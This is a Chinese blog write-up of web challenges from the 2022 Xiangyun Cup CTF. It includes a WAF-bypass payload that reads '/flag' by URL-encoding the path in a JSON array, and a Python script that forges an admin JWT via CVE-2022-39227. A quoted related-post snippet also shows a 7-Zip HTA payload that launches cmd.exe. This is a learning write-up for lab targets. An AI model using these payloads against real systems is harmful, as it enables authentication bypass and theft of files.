祥云杯2022复现

最新推荐文章于 2024-04-27 19:20:23 发布
最新推荐文章于 2024-04-27 19:20:23 发布
阅读量992 收藏 3
点赞数
分类专栏: 比赛复现 文章标签: javascript 前端 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/your_friends/article/details/127832505
版权

RustWaf

先读src,然后使用/readfile 传入/flag可以进一步看到源码

const express = require('express');
const app = express();
const bodyParser = require("body-parser")
const fs = require("fs")
app.use(bodyParser.text({type: '*/*'}));
const {  execFileSync } = require('child_process');

app.post('/readfile', function (req, res) {
    let body = req.body.toString();
    let file_to_read = "app.js";
    const file = execFileSync('/app/rust-waf', [body], {
        encoding: 'utf-8'
    }).trim();
    try {
        file_to_read = JSON.parse(file)
    } catch (e){
        file_to_read = file
    }
    let data = fs.readFileSync(file_to_read);
    res.send(data.toString());
});

app.get('/', function (req, res) {
    res.send('see `/src`');
});



app.get('/src', function (req, res) {
    var data = fs.readFileSync('app.js');
    res.send(data.toString());
});

app.listen(3000, function () {
    console.log('start listening on port 3000');
});

/flag

use std::env;
use serde::{Deserialize, Serialize};
use serde_json::Value;

static BLACK_PROPERTY: &str = "protocol";

#[derive(Debug, Serialize, Deserialize)]
struct File{
    #[serde(default = "default_protocol")]
    pub protocol: String,
    pub href: String,
    pub origin: String,
    pub pathname: String,
    pub hostname:String
}

pub fn default_protocol() -> String {
    "http".to_string()
}
//protocol is default value,can't be customized
pub fn waf(body: &str) -> String {
    if body.to_lowercase().contains("flag") ||  body.to_lowercase().contains("proc"){
        return String::from("./main.rs"); //这里限制我们不能带有flag和proc字段
    }
    if let Ok(json_body) = serde_json::from_str::<Value>(body) {
        if let Some(json_body_obj) = json_body.as_object() {
            if json_body_obj.keys().any(|key| key == BLACK_PROPERTY) {
                return String::from("./main.rs");    //这里限制我们的json字段不能带有protocol字段,但是下面限制我们是file结构体,这也就意味着我们一定要有protocol字段
            }
        }
        //not contains protocol,check if struct is File
        if let Ok(file) = serde_json::from_str::<File>(body) {//限制我们只能是这个结构体
            return serde_json::to_string(&file).unwrap_or(String::from("./main.rs"));
        }
    } else{
        //body not json
        return String::from(body);
    }
    return String::from("./main.rs");
}

fn main() {
    let args: Vec<String> = env::args().collect();
    println!("{}", waf(&args[1]));  //这里把json的第二字段传进去
}

但是在这里在这里插入图片描述
readFileSync这个方法是可以接收url编码内容的
详情见pysnow师傅的这篇
["file:","b","a","/%66%6c%61%67",""]
这样就可以解析url编码拿到/flag

ezjava

没接触java,CC4试了一个下午,本地没出,寄!日后复现。

webfun

考点jwt伪造1day+grahql注入
我这里只复现一下这个jwt伪造了,grahql只能纸上谈兵的看看了并不能实操

考到了jwt新出的CVE-2022-39227

抓包的时候有一串jwt,解码出来之后可以看到
在这里插入图片描述
而我们点击页面的各种功能提示都是权限不够,那么这里也就是需要构造is_admin=1,在jwt这个版本更新之后,留下了检测是否存在漏洞的pochttps://github.com/davedoesdev/python-jwt/blob/master/test/vulnerability_vows.py这个CVE的漏洞就是不需要公钥以及私钥就能构造出jwt的认证,稍作修改就可以更改:将里面的sub=bob改成is_admin=1然后拿出来输出一下
在这里插入图片描述
给出payload:

from datetime import timedelta
from json import loads, dumps
from common import generated_keys
import python_jwt as jwt
from pyvows import Vows, expect
from jwcrypto.common import base64url_decode, base64url_encode

def topic(topic):
    """ Use mix of JSON and compact format to insert forged claims including long expiration """
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    parsed_payload['is_admin'] = 1
    parsed_payload['exp'] = 2000000000
    fake_payload = base64url_encode(
        (dumps(parsed_payload, separators=(',', ':'))))
    # print (header+ '.' +fake_payload+ '.' +signature)
    # print (header+ '.' + payload+ '.' +signature)
    return '{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'

originaltoken = '''给出的jwt'''

topic = topic(originaltoken)
print(topic)

这样就能够以admin的形式登陆了
查看flag还是不行,但是这里还有一个查询接口
在这里插入图片描述
苦于没有环境,我就只能口述了,利用graphql注入,注入出账号密码,最终登陆拿到flag

Yan9.
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
祥云-re复现 (未完待续)
qq_37439229的博客
11-23 640
周末祥云没打,主要是自己想摸了。。(就是这么直白)还有就是nctf举办,我出题,我到比赛那天还没出完。。。(太咕了。。) 比赛后就想来复现这比赛,看解题人数,感觉满难的,应该很有质量,就跟着null的wp复现吧,一天复现一题 re1 动态调试,发现对flag的每一位进行相同的操作,慢慢看太多了,因此可以gdb脚本爆破, null的脚本写错了把。。程序开了pie,第一句就不对。。。而且while也没让程序重新启动,这里给出我写的 pwndbg> define f1 Type commands for
祥云2021 Web复现
feng的博客
08-25 1839
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
第十五届蓝桥网络安全赛项 ezjava writeup
最新发布
weixin_45936149的博客
04-27 853
第15届蓝桥ezjava writeup
2022祥云---Crypto
Luiino的博客
11-08 459
暗示与费马定理有关。看p、q的生成过程,可以大概猜出pq是相近的,至于obfuscate里while循环里的内容看不太懂。用yafu工具试着分解一下n,就得到了。再用基础方法解rsa,得到m。由费马定理可以推出x = p-1,故把上面得到的m与。水平太烂,只能搞出来一道题。
2020祥云
Stella_Leo的博客
08-25 478
2020-祥云 好久都没有刷过ctf的题目了,找了个比赛来复现练练手,选了祥云2020,下一步准备做DASCTF月赛。 记录一个github项目,题目超多!!! https://github.com/fghcvjk/2020xiangyuncup 准备是misc pwn re 和 crypto全做。web看看… crypto量力而行吧。。毕竟我比较菜。 MISC 签到 ZmxhZ3txcV9ncm91cF84MjY1NjYwNDB9 base64解码flag{qq_group_826566040} 进制
2022祥云---crypto wp
3tefanie丶zhou的博客
11-01 591
【天底下好看的女子多了去,好看就多看一两眼,悦目养眼嘛,人之常情,可为啥要心动?】
CTF祥云2022-1030-真题
11-01
CTF祥云2022-1030-真题
祥云2021题目汇总 祥云.7z
08-31
祥云2021题目汇总 祥云.7z
2020祥云 CTFNu1L.pdf
03-15
2020祥云 CTF WP 高清PDF版
第二届祥云 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
中式祥云图案矢量
07-25
【中式祥云图案矢量】是一种广泛应用于中国传统艺术设计中的元素,它在现代设计中也具有极高的价值。祥云,又称彩云或云彩,是中国文化中的吉祥象征,蕴含着丰富的寓意。在古代,祥云图案常被用来象征好运、福气、...
CVE-2022-39227jwt伪造
qq_32445755的博客
11-12 1230
python jwt是一个用于生成和验证JSON Web令牌的模块。3.3.4之前的版本会受到欺骗绕过身份验证的影响,从而导致身份欺骗、会话劫持或身份验证绕过。获得JWT的攻击者可以在不知道密钥的情况下任意伪造其内容。根据应用程序的不同,这可能使攻击者能够欺骗其他用户的身份、劫持他们的会话或绕过身份验证。用户应升级到版本3.3.4。没有已知的解决方法。
CVE-2022-39227-Python-JWT漏洞
Aiwin的博客
11-07 1942
CVE-2022-39227-Python-JWT漏洞
Python-JWT身份验证绕过(CVE-2022-39227)
zls1793的博客
01-01 1410
python-jwt库中的verify_jwt()存在身份验证绕过漏洞。
PolarCTF WEB题目 ezjava WP
weixin_62257805的博客
10-13 437
Polar CTF WEB题目之ezjava -SPEL注入wp
CVE-2022-29072(7z漏洞复现及对应措施)
qq_43696276的博客
04-23 1732
CVE-2022-29072(7z漏洞复现及对应措施) 首先,找个txt文本,将以下代码输入: <html> <head> <HTA:APPLICATION ID="7zipcodeexec"> <script language="jscript"> var c = "cmd.exe"; new ActiveXObject('WScript.Shell').Run(c); </script> <head> <html> 然
祥云2022 writeup
渗透测试研究中心
11-02 1896
0x01 web1.ezjava下载源码对jar文件进行反编译,发现POST /myTest会出现反序列化漏洞util ,最后好像没用到检查程序,发现apache的common−collections4,而且其反序列化利用类未被Patch一眼看到 commons-collection4-4.0, 于是直接用 ysoserial 打考点发现就是cc4附上文章外加spring−ech网上有现成的...
[祥云 2022]ezjava
Sentiment的博客
11-04 1024
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
【Polarctf】web ezjava
xsx213的博客
10-13 195
2.传入参数base64解码放入字节流数组,调用ByteArrayInputStream读入对象,再调用readject()方法。该题考点为java反序列化。1.附件jar包,下载反编译查看源码。4. 传入链条,得到flag。3.构造cc5反序列化链。
在关卡「玉兔祥云」中,如果一次游玩(中途不复活)共计燃放了 10 10 枚烟花,则会令关卡最后一个场景切换为新场景(一次游玩最多燃放 10 10 枚烟花)。 陈佳雨现在在玩这一关,现在她知道她一共通了这一关 � x 次(在现实中,陈佳雨不可能通关这一关的),并且她知道她一共燃放了 � y 枚烟花,但是她玩得太投入,不知道触发了几次新场景,请你分别计算出来最少和最多触发场景次数。 输入格式 一行,两个整数 � , � x,y。 输出格式 一行,两个整数,分别为最少次数和最多次数。
07-08
对于最少触发场景次数,我们可以假设每次通关都刚好燃放了10枚烟花。那么最少触发场景次数就是燃放的烟花数除以10的结果。 对于最多触发场景次数,我们可以假设前x-1次通关都刚好燃放了10枚烟花,最后一次通关燃放的烟花数为y % 10。那么最多触发场景次数就是燃放的烟花数除以10的结果再加上1(如果最后一次通关的烟花数不为0)。 以下是C++代码实现: ```cpp #include <iostream> using namespace std; int main() { int x, y; cin >> x >> y; int minScenes = y / 10; int maxScenes = y / 10; if (y % 10 != 0) { maxScenes++; } cout << minScenes << " " << maxScenes << endl; return 0; } ``` 希望对你有帮助!如果有任何问题,请继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值